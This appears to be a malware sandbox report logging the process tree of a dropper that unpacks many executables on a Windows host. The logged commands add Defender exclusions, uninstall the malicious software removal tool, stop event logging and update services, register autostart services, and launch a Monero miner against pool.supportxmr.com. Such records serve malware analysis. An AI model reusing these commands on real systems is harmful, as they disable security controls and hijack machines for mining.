PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 2644	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 2644	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 2644	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 764	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 764	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 764	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 764	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 764	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 764	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 764	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 764	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 764	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 764	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 764	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 764	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 764	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 764	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 764	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 764	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 764	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 764	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 764	1912	chrome.exe	chrome.exe

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Downloaders.zip
1⤵
PID:1936

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
PID:1492

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" shell32.dll,Control_RunDLL desk.cpl,Advanced,@Advanced
1⤵
- Modifies Control Panel
PID:2708

C:\Windows\system32\verclsid.exe
"C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401
1⤵
PID:1980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1912

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5599758,0x7fef5599768,0x7fef5599778
2⤵
PID:1900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1092 --field-trial-handle=1184,i,2761910534599475990,2341776995475909667,131072 /prefetch:2
2⤵
PID:1356

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1472 --field-trial-handle=1184,i,2761910534599475990,2341776995475909667,131072 /prefetch:8
2⤵
PID:2644

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1528 --field-trial-handle=1184,i,2761910534599475990,2341776995475909667,131072 /prefetch:8
2⤵
PID:764

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2260 --field-trial-handle=1184,i,2761910534599475990,2341776995475909667,131072 /prefetch:1
2⤵
PID:604

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2276 --field-trial-handle=1184,i,2761910534599475990,2341776995475909667,131072 /prefetch:1
2⤵
PID:1548

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1428 --field-trial-handle=1184,i,2761910534599475990,2341776995475909667,131072 /prefetch:2
2⤵
PID:2228

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1388 --field-trial-handle=1184,i,2761910534599475990,2341776995475909667,131072 /prefetch:1
2⤵
PID:2052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1380 --field-trial-handle=1184,i,2761910534599475990,2341776995475909667,131072 /prefetch:8
2⤵
PID:1636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3544 --field-trial-handle=1184,i,2761910534599475990,2341776995475909667,131072 /prefetch:8
2⤵
PID:2260

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3628 --field-trial-handle=1184,i,2761910534599475990,2341776995475909667,131072 /prefetch:1
2⤵
PID:1652

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3452 --field-trial-handle=1184,i,2761910534599475990,2341776995475909667,131072 /prefetch:1
2⤵
PID:2648

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1924

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap613:80:7zEvent16178
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2408

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap9750:110:7zEvent17241
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2604

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap17391:108:7zEvent2688
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:264

C:\Users\Admin\Desktop\New Text Document mod.exe
"C:\Users\Admin\Desktop\New Text Document mod.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Users\Admin\Desktop\a\uYtF.exe
"C:\Users\Admin\Desktop\a\uYtF.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2248

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
3⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2064

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
3⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1828

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
3⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1652

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
3⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1176

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "xjuumoinznsp"
3⤵
- Launches sc.exe
PID:1096

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "xjuumoinznsp" binpath= "C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe" start= "auto"
3⤵
- Launches sc.exe
PID:580

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:2536

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "xjuumoinznsp"
3⤵
- Launches sc.exe
PID:2620

C:\Users\Admin\Desktop\a\serieta.exe
"C:\Users\Admin\Desktop\a\serieta.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2384

C:\Users\Admin\AppData\Local\Temp\natura.exe
"C:\Users\Admin\AppData\Local\Temp\natura.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2644

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "HJUWGNAT"
4⤵
- Launches sc.exe
PID:2900

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "HJUWGNAT" binpath= "C:\ProgramData\agmxykvocxft\etuamactyjne.exe" start= "auto"
4⤵
- Launches sc.exe
PID:2384

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
4⤵
- Launches sc.exe
PID:2540

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "HJUWGNAT"
4⤵
- Launches sc.exe
PID:2684

C:\Users\Admin\AppData\Local\Temp\nautr.exe
"C:\Users\Admin\AppData\Local\Temp\nautr.exe"
3⤵
- Executes dropped EXE
PID:1412

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "OYGYWFTH"
4⤵
- Launches sc.exe
PID:2232

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "OYGYWFTH" binpath= "C:\ProgramData\dnbdcucuyzqs\pseaptzkxyms.exe" start= "auto"
4⤵
- Launches sc.exe
PID:1008

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
4⤵
- Launches sc.exe
PID:532

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "OYGYWFTH"
4⤵
- Launches sc.exe
PID:684

C:\Users\Admin\AppData\Local\Temp\Notepad.exe
"C:\Users\Admin\AppData\Local\Temp\Notepad.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1416

C:\Users\Admin\AppData\Local\Temp\Notepad.exe
"C:\Users\Admin\AppData\Local\Temp\Notepad.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2724

C:\Users\Admin\Desktop\a\0x3fg.exe
"C:\Users\Admin\Desktop\a\0x3fg.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
PID:3060

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:832

C:\Users\Admin\AppData\Roaming\1000001000\uYtF.exe
"C:\Users\Admin\AppData\Roaming\1000001000\uYtF.exe"
4⤵
- Executes dropped EXE
PID:2180

C:\Users\Admin\Desktop\a\setup.exe
"C:\Users\Admin\Desktop\a\setup.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2020

C:\Users\Admin\AppData\Local\Temp\setup-aeca291505e26b97\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup-aeca291505e26b97\setup.exe"
3⤵
- Executes dropped EXE
PID:2356

C:\Users\Admin\Desktop\a\BuildTotale.exe
"C:\Users\Admin\Desktop\a\BuildTotale.exe"
2⤵
- Executes dropped EXE
PID:2428

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwBuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAaABjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAcQBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAYgBiACMAPgA="
3⤵
- Command and Scripting Interpreter: PowerShell
PID:2052

C:\Users\Admin\AppData\Local\Temp\supportoxmr.exe
"C:\Users\Admin\AppData\Local\Temp\supportoxmr.exe"
3⤵
PID:960

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
4⤵
- Command and Scripting Interpreter: PowerShell
PID:1496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
4⤵
PID:3548

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
5⤵
PID:2428

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "ZODSAKKJ"
4⤵
- Launches sc.exe
PID:3556

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "ZODSAKKJ" binpath= "C:\ProgramData\ytdcogcfuxoe\wsfekkbdzjcc.exe" start= "auto"
4⤵
- Launches sc.exe
PID:3924

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
4⤵
- Launches sc.exe
PID:668

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "ZODSAKKJ"
4⤵
- Launches sc.exe
PID:1408

C:\Users\Admin\AppData\Local\Temp\etc test.exe
"C:\Users\Admin\AppData\Local\Temp\etc test.exe"
3⤵
PID:2588

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
4⤵
- Command and Scripting Interpreter: PowerShell
PID:1748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
4⤵
PID:3564

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
5⤵
PID:2284

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "OBKZWAPS"
4⤵
- Launches sc.exe
PID:3572

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "OBKZWAPS" binpath= "C:\ProgramData\rstywrmdprzs\esfowblknspo.exe" start= "auto"
4⤵
- Launches sc.exe
PID:3904

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
4⤵
- Launches sc.exe
PID:1664

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "OBKZWAPS"
4⤵
- Launches sc.exe
PID:2088

C:\Users\Admin\AppData\Local\Temp\Notepad.exe
"C:\Users\Admin\AppData\Local\Temp\Notepad.exe"
3⤵
PID:2816

C:\Users\Admin\AppData\Local\Temp\Notepad.exe
"C:\Users\Admin\AppData\Local\Temp\Notepad.exe"
4⤵
PID:1440

C:\Users\Admin\Desktop\a\taskweaker.exe
"C:\Users\Admin\Desktop\a\taskweaker.exe"
2⤵
PID:2928

C:\Users\Admin\Desktop\a\ama.exe
"C:\Users\Admin\Desktop\a\ama.exe"
2⤵
PID:1724

C:\Users\Admin\AppData\Local\Temp\6.exe
"C:\Users\Admin\AppData\Local\Temp\6.exe"
3⤵
PID:3140

C:\Users\Admin\AppData\Local\Temp\7.exe
"C:\Users\Admin\AppData\Local\Temp\7.exe"
3⤵
PID:2908

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
4⤵
PID:3948

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.co/1lLub
3⤵
PID:3988

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3988 CREDAT:275457 /prefetch:2
4⤵
PID:2340

C:\Users\Admin\Desktop\a\setup222.exe
"C:\Users\Admin\Desktop\a\setup222.exe"
2⤵
PID:340

C:\Users\Admin\Desktop\a\SetupWizard.exe
SetupWizard.exe
3⤵
PID:2248

C:\Users\Admin\AppData\Local\Temp\SetupWizard-f543713aea9a5a98\SetupWizard.exe
"C:\Users\Admin\AppData\Local\Temp\SetupWizard-f543713aea9a5a98\SetupWizard.exe"
4⤵
PID:2516

C:\Users\Admin\Desktop\a\SetupWizard.exe
SetupWizard.exe
3⤵
PID:3032

C:\Users\Admin\Desktop\a\SetupWizard.exe
SetupWizard.exe
3⤵
PID:4412

C:\Users\Admin\Desktop\a\FirstZ.exe
"C:\Users\Admin\Desktop\a\FirstZ.exe"
2⤵
PID:3044

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
3⤵
- Command and Scripting Interpreter: PowerShell
PID:3476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
3⤵
PID:2224

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
4⤵
PID:3016

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
3⤵
- Launches sc.exe
PID:1456

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1008

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
3⤵
- Launches sc.exe
PID:3100

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
3⤵
- Launches sc.exe
PID:3460

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
3⤵
- Launches sc.exe
PID:3216

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
3⤵
- Power Settings
PID:2548

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
3⤵
- Power Settings
PID:3608

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
3⤵
- Power Settings
PID:2876

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
3⤵
- Power Settings
PID:2888

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WSNKISKT"
3⤵
- Launches sc.exe
PID:2460

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
3⤵
- Launches sc.exe
PID:3380

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:3836

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WSNKISKT"
3⤵
- Launches sc.exe
PID:1616

C:\Users\Admin\Desktop\a\pic1.exe
"C:\Users\Admin\Desktop\a\pic1.exe"
2⤵
PID:2944

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
3⤵
PID:1640

C:\Users\Admin\AppData\Local\Temp\RarSFX0\rolex.exe
rolex.exe -priverdD
4⤵
PID:2608

C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe"
5⤵
PID:2344

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2368

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1944

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1564

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2688

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2664

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2564

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1364

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1504

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2736

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:760

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1640

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2604

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2800

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:2576

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
